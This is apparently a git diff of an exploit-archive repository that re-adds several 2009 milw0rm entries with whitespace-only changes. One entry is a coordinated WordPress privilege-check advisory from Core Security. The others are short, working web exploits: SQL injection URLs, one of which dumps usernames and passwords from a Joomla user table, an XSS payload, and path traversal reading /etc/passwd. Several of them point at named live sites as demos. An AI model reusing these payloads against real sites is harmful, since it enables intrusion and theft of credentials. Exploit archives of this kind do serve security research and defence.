- -/----------- - -\"/>June 3rd, 2009 -- -----------/ - - - -Also several administrative modules give to anyone the complete path -where the web application is hosted inside the server. This may simplify -or enable other malicious attacks. An example follows. - -/----------- - -http://[some_wordpress_blog]/wp-settings.php -- -----------/ - - - -/----------- - -Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in -[WP_LEAKED_PATH]\wp-settings.php on line 110 -Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in -[WP_LEAKED_PATH]\wp-settings.php on line 112 -Warning: require(ABSPATHwp-includes/compat.php) [function.require]: -failed to open stream: -No such file or directory in [WP_LEAKED_PATH]\wp-settings.php on line 246 -Fatal error: require() [function.require]: Failed opening required -'ABSPATHwp-includes/compat.php' -(include_path='.;[PHP_LEAKED_PATH]\php5\pear') in -[WP_LEAKED_PATH]\wp-settings.php on line 246 - -- -----------/ - - - - -9. *Report Timeline* - -. 2009-06-04: -Core Security Technologies notifies the WordPress team of the -vulnerabilities (security@wordpress.org) and offers a technical -description encrypted or in plain-text. Advisory is planned for -publication on June 22th. - -. 2009-06-08: -Core notifies again the WordPress team of the vulnerability. - -. 2009-06-10: -The WordPress team asks Core for a technical description of the -vulnerability in plain-text. - -. 2009-06-11: -Technical details sent to WordPress team by Core. - -. 2009-06-11: -WordPress team notifies Core that a fix was produced and is available to -Core for testing. WordPress team asserts that password and username -discrimination as well as username leakage are known and will not be -fixed because they are convenient for the users. - -. 2009-06-12: -Core tells the WordPress team that the patch will be tested by Core as a -courtesy as soon as possible. 
It also requests confirmation that -WordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to -the flaws included in the advisory draft CORE-2009-0515. - -. 2009-06-12: -WordPress team confirms that WordPress 2.8 and earlier plus -WordPress.com are vulnerable to the flaws included in the advisory draft. - -. 2009-06-17: -Core informs the WordPress team that the patch is only fixing one of the -four proof of concept abuses included in the advisory draft. Core -reminds the WordPress team that the advisory is scheduled to be -published on June 22th but a new schedule can be discussed. - -. 2009-06-19: -Core asks for a new patched version of WordPress, if available, and -notifies the WordPress team that the publication of the advisory was -re-scheduled to June 30th. - -. 2009-06-19: -WordPress team confirms they have a new patch that has the potential to -break a lot of plugins. - -. 2009-06-29: -WordPress team asks for a delayance on advisory CORE-2009-0515 -publication until July 6th, when WordPress MU version will be patched. - -. 2009-06-29: -Core agrees to delay publication of advisory CORE-2009-0515 until July 6th. - -. 2009-06-29: -Core tells the WordPress team that other administrative PHP modules can -also be rendered by non-administrative users, such as module -'admin-post.php' and 'link-parse-opml.php'. - -. 2009-07-02: -WordPress team comments that 'admin.php' and 'admin-post.php' are -intentionally open and plugins can choose to hook either privileged or -unprivileged actions. They also comment that unprivileged access to -'link-parse-opml.php' is benign but having this file open is bad form. - -. 2009-07-02: -Core sends the WordPress team a new draft of the advisory and comments -that there is no capability specified in Worpress documentation for -configuring plugins. Also control of actions registered by plugins is -not enforced. 
Core also notices that the privileges unchecked bug in -'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development -release. - -. 2009-07-06: -Core requests WordPress confirmation of the release date of WordPress -2.8.1 and WordPress MU 2.8. - -. 2009-07-07: -WordPress team confirms that a release candidate of WordPress 2.8.1 is -made available to users and that the advisory may be published. - -. 2009-07-06: -Core requests WordPress confirmation of the release date of WordPress MU -and WordPress MU new version numbers. - -. 2009-07-07: -WordPress team release WordPress 2.8.1 RC1 to its users. - -. 2009-07-08: -WordPress team confirms that WordPress MU 2.8.1 will be made available -as soon WordPress 2.8.1 is officially released. Probably July 8th or 9th. - -. 2009-07-08: -The advisory CORE-2009-0515 is published. - - - -10. *References* - -[1] WordPress vulnerabilities in CVE database -http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress -[2] SecuriTeam List of WordPress Vulnerabilities -http://www.securiteam.com/products/W/Wordpress.html -[3] WordPress Vulnerability - YBO Interactive Blog -http://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/ -[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1 -http://wordpress.org/support/topic/280748 -[5] Security breach - xkcd blog -http://blag.xkcd.com/2009/06/18/security-breach/ -[6] securityvulns.com WordPress vulnerabilities digest in English -http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded -[7] CVE-2008-0196 -http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196 -[8] WordPress Roles and Capabilities -http://codex.wordpress.org/Roles_and_Capabilities -[9] WordPress Download Counter -http://wordpress.org/download/counter/ -[10] WordPress Intrusion Detection System Plugin -http://php-ids.org/2008/02/21/wpids-version-012-released/ -[11] Hardening WordPress with htaccess -http://blogsecurity.net/wordpress/article-210607 - - -11. 
*About CoreLabs* - -CoreLabs, the research center of Core Security Technologies, is charged -with anticipating the future needs and requirements for information -security technologies. We conduct our research in several important -areas of computer security including system vulnerabilities, cyber -attack planning and simulation, source code auditing, and cryptography. -Our results include problem formalization, identification of -vulnerabilities, novel solutions and prototypes for new technologies. -CoreLabs regularly publishes security advisories, technical papers, -project information and shared software tools for public use at: -http://www.coresecurity.com/corelabs. - - -12. *About Core Security Technologies* - -Core Security Technologies develops strategic solutions that help -security-conscious organizations worldwide develop and maintain a -proactive process for securing their networks. The company's flagship -product, CORE IMPACT, is the most comprehensive product for performing -enterprise security assurance testing. CORE IMPACT evaluates network, -endpoint and end-user vulnerabilities and identifies what resources are -exposed. It enables organizations to determine if current security -investments are detecting and preventing attacks. Core Security -Technologies augments its leading technology solution with world-class -security consulting services, including penetration testing and software -security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core -Security Technologies can be reached at 617-399-6980 or on the Web at -http://www.coresecurity.com. - - -13. *Disclaimer* - -The contents of this advisory are copyright (c) 2009 Core Security -Technologies and (c) 2009 CoreLabs, and may be distributed freely -provided that no fee is charged for this distribution and proper credit -is given. - - -14. 
*PGP/GPG Keys* - -This advisory has been signed with the GPG key of Core Security -Technologies advisories team, which is available for download at -http://www.coresecurity.com/files/attachments/core_security_advisories.asc. ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.6 (MingW32) -Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org - -iD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N -TPRpR0Gn0WqmF8HOeDslbA8= -=zEDK ------END PGP SIGNATURE----- - -# milw0rm.com [2009-07-10] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + + Core Security Technologies - CoreLabs Advisory + http://www.coresecurity.com/corelabs/ + +WordPress Privileges Unchecked in admin.php and Multiple Information +Disclosures + + + +1. *Advisory Information* + +Title: WordPress Privileges Unchecked in admin.php and Multiple +Information Disclosures +Advisory ID: CORE-2009-0515 +Advisory URL: +http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked +Date published: 2009-07-08 +Date of last update: 2009-07-08 +Vendors contacted: WordPress +Release mode: Coordinated release + + +2. *Vulnerability Information* + +Class: Local file include, Privileges unchecked, Cross site scripting +(XSS), Information disclosure +Remotely Exploitable: Yes +Locally Exploitable: No +Bugtraq ID: 35581, 35584 +CVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336 + + +3. *Vulnerability Description* + +WordPress is a web application written in PHP that allows the easy +installation of a flexible weblog on any computer connected to the +Internet. WordPress 2.7 reached more than 6 million downloads during +June 2009 [9]. + +A vulnerability was found in the way that WordPress handles some URL +requests. This results in unprivileged users viewing the content of +plugins configuration pages, and also in some plugins modifying plugin +options and injecting JavaScript code. 
Arbitrary native code may be run +by a malicious attacker if the blog administrator runs injected +JavasScript code that edits blog PHP code. Many WordPress-powered blogs, +hosted outside 'wordpress.com', allow any person to create unprivileged +users called subscribers. Other sensitive username information +disclosures were found in WordPress. + + +4. *Vulnerable packages* + + . WordPress 2.8 and previous + . WordPress MU 2.7.1 and previous, used in WordPress.com + + +5. *Non-vulnerable packages* + + . WordPress 2.8.1 + . WordPress MU 2.8.1, used in WordPress.com + + +6. *Vendor Information, Solutions and Workarounds* + +Mitigation for the Privileges Unchecked vulnerability (suggested by Core +Security): this vulnerability may be mitigated by controlling access to +files inside the 'wp-admin' folder. Access can be prohibited by using +Apache access control mechanism ('.htaccess' file), see guideline for +more information [11]. + + +7. *Credits* + +These vulnerabilities were discovered and researched by Fernando +Arnaboldi and José Orlicki from Core Security Technologies. Further +research was made by Jose Orlicki from Core Security Technologies. + + +8. *Technical Description / Proof of Concept Code* + + +8.1. *Introduction* + +In the last few years several security bugs were found in WordPress +[1][2]. During 2008, the big amount of bugs reported by researchers lead +to exploitation by blog spammers [3]. During 2009, a new round of +attacks has appeared and security researchers are reporting new bugs or +wrongly fixed previously-reported bugs [4][5]. A path traversal in local +files included by 'admin.php' has been fixed [6][7] but, in our case, we +report that administrative privileges are still unchecked when accessing +any PHP file inside a plugin folder. + + +8.2. *Access Control Roles* + +WordPress has a privilege model where any user has an assigned role [8]. +Regarding plugins only users characterized by the role Administrator can +activate plugins. 
Notice that only the blog hosting owner can add new +plugins because these must by copied inside the host filesystem. The +roles Editor, Author or Subscriber (the latter has the least privileges) +cannot activate plugins, edit plugins, update plugins nor delete plugins +installed by an Administrator. Besides that, the configuration of +specific plugins is a grey area because there is no distinguished +capability assigned [8]. + +Also due to cross-site scripting vulnerabilities inside plugins options +(something very common), non-administrative users reconfiguring plugins +may inject persistent JavaScript code. Possibly arbitrary native code +can be executed by the attacker if the blog administrator runs injected +JavasScript code that injects PHP code. It is important to observe that +many WordPress-powered blogs are configured to allow any blog visitor to +create a Subscriber user without confirmation from the Administrator +role inside the following URL, although by default the Administrator +role must create these new users. + +/----------- + +http://[some_wordpress_blog]/wp-login.php?action=register +- -----------/ + + This can be modified by the administrator in 'Membership/Anyone can +register'. + +/----------- + +http://[some_wordpress_blog]/wp-admin/options-general.php +- -----------/ + + + + +8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes +(CVE-2009-2334, BID 35581)* + +No privileges are checked on WordPress plugins configuration PHP modules +using parameter 'page' when we replace 'options-general.php' with +'admin.php'. The same thing happens when replacing other modules such as +'plugins.php' with 'admin.php'. Basic information disclosure is done +this way. For example, with the following URL a user with no privileges +can see the configuration of plugin Collapsing Archives, if installed. 
+ +/----------- + +http://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt +- -----------/ + + Instead of the following allowed URL. + +/----------- + +http://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt +- -----------/ + + Another example of this information disclosure is shown on Akismet, a +plugin shipped by default with WordPress. + +/----------- + +http://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt +- -----------/ + + All plugins we have tested are vulnerable to this kind of information +disclosure, but in many of them the PHP files accessed just crashed. On +the other hand, for example, with capability 'import', privileges are +checked inside 'admin.php': + +/----------- + +if ( ! current_user_can('import') ) + wp_die(__('You are not allowed to import.')); +- -----------/ + + More dangerous scenarios exist, all of them can be exploited by users +with the Subscriber role, the least privileged. + + +8.4. *Abuse example: XSS in plugin configuration module* + +If installed, *Related Ways To Take Action* is an example of a WordPress +plugin that is affected by many cross-site scripting vulnerabilities +(XSS) that can be leveraged by an attacker using the unchecked +privileges described in this advisory to inject persistent JavaScript +code. Possibly, arbitrary native code can be executed by the attacker if +the blog administrator, when he/she logs in, runs injected JavasScript +code that edits blog PHP code. The original URL for reconfiguring the +plugin can be accessed only by the Administrator role. + +/----------- + +http://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php +- -----------/ + + But replacing the PHP file with the generic 'admin.php' any blog user +can modify this configuration. 
+ +/----------- + +http://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php +- -----------/ + + The following JavaScript injection can be entered within field *Exclude +actions by term* to exemplify this kind of abuse. When the administrator +enters the same page the injected browser code will be executed and +possibly blog PHP can be modified to run arbitrary native code. + +/----------- + +\"/>June 3rd, 2009 +- -----------/ + + + +Also several administrative modules give to anyone the complete path +where the web application is hosted inside the server. This may simplify +or enable other malicious attacks. An example follows. + +/----------- + +http://[some_wordpress_blog]/wp-settings.php +- -----------/ + + + +/----------- + +Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in +[WP_LEAKED_PATH]\wp-settings.php on line 110 +Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in +[WP_LEAKED_PATH]\wp-settings.php on line 112 +Warning: require(ABSPATHwp-includes/compat.php) [function.require]: +failed to open stream: +No such file or directory in [WP_LEAKED_PATH]\wp-settings.php on line 246 +Fatal error: require() [function.require]: Failed opening required +'ABSPATHwp-includes/compat.php' +(include_path='.;[PHP_LEAKED_PATH]\php5\pear') in +[WP_LEAKED_PATH]\wp-settings.php on line 246 + +- -----------/ + + + + +9. *Report Timeline* + +. 2009-06-04: +Core Security Technologies notifies the WordPress team of the +vulnerabilities (security@wordpress.org) and offers a technical +description encrypted or in plain-text. Advisory is planned for +publication on June 22th. + +. 2009-06-08: +Core notifies again the WordPress team of the vulnerability. + +. 2009-06-10: +The WordPress team asks Core for a technical description of the +vulnerability in plain-text. + +. 2009-06-11: +Technical details sent to WordPress team by Core. + +. 
2009-06-11: +WordPress team notifies Core that a fix was produced and is available to +Core for testing. WordPress team asserts that password and username +discrimination as well as username leakage are known and will not be +fixed because they are convenient for the users. + +. 2009-06-12: +Core tells the WordPress team that the patch will be tested by Core as a +courtesy as soon as possible. It also requests confirmation that +WordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to +the flaws included in the advisory draft CORE-2009-0515. + +. 2009-06-12: +WordPress team confirms that WordPress 2.8 and earlier plus +WordPress.com are vulnerable to the flaws included in the advisory draft. + +. 2009-06-17: +Core informs the WordPress team that the patch is only fixing one of the +four proof of concept abuses included in the advisory draft. Core +reminds the WordPress team that the advisory is scheduled to be +published on June 22th but a new schedule can be discussed. + +. 2009-06-19: +Core asks for a new patched version of WordPress, if available, and +notifies the WordPress team that the publication of the advisory was +re-scheduled to June 30th. + +. 2009-06-19: +WordPress team confirms they have a new patch that has the potential to +break a lot of plugins. + +. 2009-06-29: +WordPress team asks for a delayance on advisory CORE-2009-0515 +publication until July 6th, when WordPress MU version will be patched. + +. 2009-06-29: +Core agrees to delay publication of advisory CORE-2009-0515 until July 6th. + +. 2009-06-29: +Core tells the WordPress team that other administrative PHP modules can +also be rendered by non-administrative users, such as module +'admin-post.php' and 'link-parse-opml.php'. + +. 2009-07-02: +WordPress team comments that 'admin.php' and 'admin-post.php' are +intentionally open and plugins can choose to hook either privileged or +unprivileged actions. 
They also comment that unprivileged access to +'link-parse-opml.php' is benign but having this file open is bad form. + +. 2009-07-02: +Core sends the WordPress team a new draft of the advisory and comments +that there is no capability specified in Worpress documentation for +configuring plugins. Also control of actions registered by plugins is +not enforced. Core also notices that the privileges unchecked bug in +'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development +release. + +. 2009-07-06: +Core requests WordPress confirmation of the release date of WordPress +2.8.1 and WordPress MU 2.8. + +. 2009-07-07: +WordPress team confirms that a release candidate of WordPress 2.8.1 is +made available to users and that the advisory may be published. + +. 2009-07-06: +Core requests WordPress confirmation of the release date of WordPress MU +and WordPress MU new version numbers. + +. 2009-07-07: +WordPress team release WordPress 2.8.1 RC1 to its users. + +. 2009-07-08: +WordPress team confirms that WordPress MU 2.8.1 will be made available +as soon WordPress 2.8.1 is officially released. Probably July 8th or 9th. + +. 2009-07-08: +The advisory CORE-2009-0515 is published. + + + +10. 
*References* + +[1] WordPress vulnerabilities in CVE database +http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress +[2] SecuriTeam List of WordPress Vulnerabilities +http://www.securiteam.com/products/W/Wordpress.html +[3] WordPress Vulnerability - YBO Interactive Blog +http://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/ +[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1 +http://wordpress.org/support/topic/280748 +[5] Security breach - xkcd blog +http://blag.xkcd.com/2009/06/18/security-breach/ +[6] securityvulns.com WordPress vulnerabilities digest in English +http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded +[7] CVE-2008-0196 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196 +[8] WordPress Roles and Capabilities +http://codex.wordpress.org/Roles_and_Capabilities +[9] WordPress Download Counter +http://wordpress.org/download/counter/ +[10] WordPress Intrusion Detection System Plugin +http://php-ids.org/2008/02/21/wpids-version-012-released/ +[11] Hardening WordPress with htaccess +http://blogsecurity.net/wordpress/article-210607 + + +11. *About CoreLabs* + +CoreLabs, the research center of Core Security Technologies, is charged +with anticipating the future needs and requirements for information +security technologies. We conduct our research in several important +areas of computer security including system vulnerabilities, cyber +attack planning and simulation, source code auditing, and cryptography. +Our results include problem formalization, identification of +vulnerabilities, novel solutions and prototypes for new technologies. +CoreLabs regularly publishes security advisories, technical papers, +project information and shared software tools for public use at: +http://www.coresecurity.com/corelabs. + + +12. 
*About Core Security Technologies* + +Core Security Technologies develops strategic solutions that help +security-conscious organizations worldwide develop and maintain a +proactive process for securing their networks. The company's flagship +product, CORE IMPACT, is the most comprehensive product for performing +enterprise security assurance testing. CORE IMPACT evaluates network, +endpoint and end-user vulnerabilities and identifies what resources are +exposed. It enables organizations to determine if current security +investments are detecting and preventing attacks. Core Security +Technologies augments its leading technology solution with world-class +security consulting services, including penetration testing and software +security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core +Security Technologies can be reached at 617-399-6980 or on the Web at +http://www.coresecurity.com. + + +13. *Disclaimer* + +The contents of this advisory are copyright (c) 2009 Core Security +Technologies and (c) 2009 CoreLabs, and may be distributed freely +provided that no fee is charged for this distribution and proper credit +is given. + + +14. *PGP/GPG Keys* + +This advisory has been signed with the GPG key of Core Security +Technologies advisories team, which is available for download at +http://www.coresecurity.com/files/attachments/core_security_advisories.asc. +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.6 (MingW32) +Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org + +iD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N +TPRpR0Gn0WqmF8HOeDslbA8= +=zEDK +-----END PGP SIGNATURE----- + +# milw0rm.com [2009-07-10] diff --git a/platforms/php/webapps/9111.txt b/platforms/php/webapps/9111.txt index ecc2940a3..f3fbf5bd6 100755 --- a/platforms/php/webapps/9111.txt +++ b/platforms/php/webapps/9111.txt 
@@ -1,45 +1,45 @@ -########################################################################### -#-----------------------------I AM MUSLIM !!------------------------------# -########################################################################### - -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - [»] Hmmmm !? Nothing ! :D -============================================================================== - [»] Jobbr v2.2.7 Multiple Remote SQL Injection Vulnerabilities -============================================================================== - - [»] Script: [ Jobbr v2.2.7 ] - [»] Language: [ PHP ] - [»] Download: [ http://urx.in/jobbr ] - [»] Founder: [ Moudi or SixSo ] - [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...] 
- [»] Team: [ EvilWay ] - [»] SiteWeb: [ Visit - www.opensc.ws ] - [»] Price: [ FREE ] - -########################################################################### - -===[ Exploit BLIND SQL + DEMO ]=== - - [»] http://www.site.com/co-profile.php?emp_id=[SQL] - [»] http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8-- - -===[ Exploit BLIND SQL + DEMO ]=== - - [»] http://www.site.com/co-profile.php?emp_id=[BLIND] - [»] http://www.jobbr.us/co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5 - - -Author: Moudi - -########################################################################### - -# milw0rm.com [2009-07-10] +########################################################################### +#-----------------------------I AM MUSLIM !!------------------------------# +########################################################################### + +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + [»] Hmmmm !? Nothing ! :D +============================================================================== + [»] Jobbr v2.2.7 Multiple Remote SQL Injection Vulnerabilities +============================================================================== + + [»] Script: [ Jobbr v2.2.7 ] + [»] Language: [ PHP ] + [»] Download: [ http://urx.in/jobbr ] + [»] Founder: [ Moudi or SixSo ] + [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...] 
+ [»] Team: [ EvilWay ] + [»] SiteWeb: [ Visit - www.opensc.ws ] + [»] Price: [ FREE ] + +########################################################################### + +===[ Exploit BLIND SQL + DEMO ]=== + + [»] http://www.site.com/co-profile.php?emp_id=[SQL] + [»] http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8-- + +===[ Exploit BLIND SQL + DEMO ]=== + + [»] http://www.site.com/co-profile.php?emp_id=[BLIND] + [»] http://www.jobbr.us/co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5 + + +Author: Moudi + +########################################################################### + +# milw0rm.com [2009-07-10] diff --git a/platforms/php/webapps/9112.txt b/platforms/php/webapps/9112.txt index 0e8fdc157..b6c0ab554 100755 --- a/platforms/php/webapps/9112.txt +++ b/platforms/php/webapps/9112.txt 
@@ -1,34 +1,33 @@ - --------------------------------------------------------------------------- -Joomla Component com_propertylab (auction_id) SQL injection Vulnerability --------------------------------------------------------------------------- - - ################################################### - [+] Author : Chip D3 Bi0s - [+] Email : chipdebios[alt+64]gmail.com - [+] Group : LatinHackTeam - [+] Vulnerability : SQL injection - ################################################### - - -Example: - -http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26 - -: -+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users - - -Demo Live (1): - -http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users - - -Thanks for all Str0ke -and you are unbeatable :) - -+++++++++++++++++++++++++++++++++ -[!] 
Produced in South America ---------------------------------- - -# milw0rm.com [2009-07-10] +-------------------------------------------------------------------------- +Joomla Component com_propertylab (auction_id) SQL injection Vulnerability +-------------------------------------------------------------------------- + + ################################################### + [+] Author : Chip D3 Bi0s + [+] Email : chipdebios[alt+64]gmail.com + [+] Group : LatinHackTeam + [+] Vulnerability : SQL injection + ################################################### + + +Example: + +http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26 + +: ++and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users + + +Demo Live (1): + +http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users + + +Thanks for all Str0ke +and you are unbeatable :) + ++++++++++++++++++++++++++++++++++ +[!] Produced in South America +--------------------------------- + +# milw0rm.com [2009-07-10] diff --git a/platforms/php/webapps/9115.txt b/platforms/php/webapps/9115.txt index 6afbfe6fb..74a33d628 100755 --- a/platforms/php/webapps/9115.txt +++ b/platforms/php/webapps/9115.txt 
@@ -1,21 +1,21 @@ -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -- __ __ _ __ - -+ ____/ /___ ______/ /__ (_)___ / /_____ _____ + -- / __ / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/ - -+ / /_/ / /_/ / / / ,< / / /_/ / ,< / __/ / + -- \__,_/\__,_/_/ /_/|_|_/ /\____/_/|_|\___/_/ - -+ /___/ + -- - -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ - - -Digitaldesign CMS v0.1 Database Disclosure Vulnerability - -[+] Author : darkjoker -[+] Site : http://darkjoker.net23.net -[+] Download: http://sourceforge.net/projects/ddcms/ - -[+] URL : http://[hostname]/[CMS path]/autoconfig.dd -[+] Ex. : http://localhost/ddcms/autoconfig.dd - -# milw0rm.com [2009-07-10] ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +- __ __ _ __ - ++ ____/ /___ ______/ /__ (_)___ / /_____ _____ + +- / __ / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/ - ++ / /_/ / /_/ / / / ,< / / /_/ / ,< / __/ / + +- \__,_/\__,_/_/ /_/|_|_/ /\____/_/|_|\___/_/ - ++ /___/ + +- - ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + +Digitaldesign CMS v0.1 Database Disclosure Vulnerability + +[+] Author : darkjoker +[+] Site : http://darkjoker.net23.net +[+] Download: http://sourceforge.net/projects/ddcms/ + +[+] URL : http://[hostname]/[CMS path]/autoconfig.dd +[+] Ex. : http://localhost/ddcms/autoconfig.dd + +# milw0rm.com [2009-07-10] diff --git a/platforms/php/webapps/9118.txt b/platforms/php/webapps/9118.txt index 195a6344c..2300207d1 100755 --- a/platforms/php/webapps/9118.txt +++ b/platforms/php/webapps/9118.txt 
@@ -1,47 +1,47 @@ -########################################################################### -#-----------------------------I AM MUSLIM !!------------------------------# -########################################################################### - -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - [»] I'm back <3 VB6 -============================================================================== - [»] Ebay Clone 2009 Multiple Remote Vulnerabilities -============================================================================== - - [»] Script: [ Ebay Clone 2009 ] - [»] Language: [ PHP ] - [»] Download: [ http://www.ebayclonescript.com/ ] - [»] Founder: [ Moudi or SixSo ] - [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...] 
- [»] Team: [ EvilWay ] - [»] SiteWeb: [ Visit - www.opensc.ws ] - [»] Price: [ 99$ ] - -########################################################################### - -===[ Exploit BLIND SQL ]=== - - [»] http://www.site.com/patch/category.php?view=list&cate_id=[BLIND] - [»] http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5 - -===[ Exploit XSS ]=== - - [»] http://www.site.com/patch/search.php?mode=[XSS] - [»] http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E - -Note: in this script have some other blind sql and xss , but i am tired to do all :D - - -Author: Moudi - -########################################################################### - -# milw0rm.com [2009-07-10] +########################################################################### +#-----------------------------I AM MUSLIM !!------------------------------# +########################################################################### + +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + [»] I'm back <3 VB6 +============================================================================== + [»] Ebay Clone 2009 Multiple Remote Vulnerabilities +============================================================================== + + [»] Script: [ Ebay Clone 2009 ] + [»] Language: [ PHP ] + [»] Download: [ http://www.ebayclonescript.com/ ] + [»] Founder: [ Moudi or SixSo ] + [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...] 
+ [»] Team: [ EvilWay ] + [»] SiteWeb: [ Visit - www.opensc.ws ] + [»] Price: [ 99$ ] + +########################################################################### + +===[ Exploit BLIND SQL ]=== + + [»] http://www.site.com/patch/category.php?view=list&cate_id=[BLIND] + [»] http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5 + +===[ Exploit XSS ]=== + + [»] http://www.site.com/patch/search.php?mode=[XSS] + [»] http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E + +Note: in this script have some other blind sql and xss , but i am tired to do all :D + + +Author: Moudi + +########################################################################### + +# milw0rm.com [2009-07-10] diff --git a/platforms/php/webapps/9119.txt b/platforms/php/webapps/9119.txt index 6c6e74f54..47274f0da 100755 --- a/platforms/php/webapps/9119.txt +++ b/platforms/php/webapps/9119.txt @@ -1,19 +1,19 @@ -script home site :0 http://lionwiki.0o.cz/ - -script name := Powered by LionWiki - -exploit :- -index.php?page= ../../../../../../../../etc/passwd%00.jpg -index.php?page= ../../../../../../../../etc/passwd%00.htm -index.php?page= ../../../../../../../../etc/passwd%00.html - -demo site :- -http://wiki.tlapicka.net/index.php - ------------------------------------------- -found by MoDaMeR -Islamic ghosts Team - -Gr33tz:- all muslum hackerz ,all my freind - -# milw0rm.com [2009-07-10] +script home site :0 http://lionwiki.0o.cz/ + +script name := Powered by LionWiki + +exploit :- +index.php?page= ../../../../../../../../etc/passwd%00.jpg +index.php?page= ../../../../../../../../etc/passwd%00.htm +index.php?page= ../../../../../../../../etc/passwd%00.html + +demo site :- +http://wiki.tlapicka.net/index.php + +------------------------------------------ +found by MoDaMeR +Islamic ghosts Team + +Gr33tz:- all muslum hackerz ,all my freind + +# milw0rm.com [2009-07-10] 
diff --git a/platforms/php/webapps/9121.php b/platforms/php/webapps/9121.php index 873d179a3..a4f32e196 100755 --- a/platforms/php/webapps/9121.php +++ b/platforms/php/webapps/9121.php 
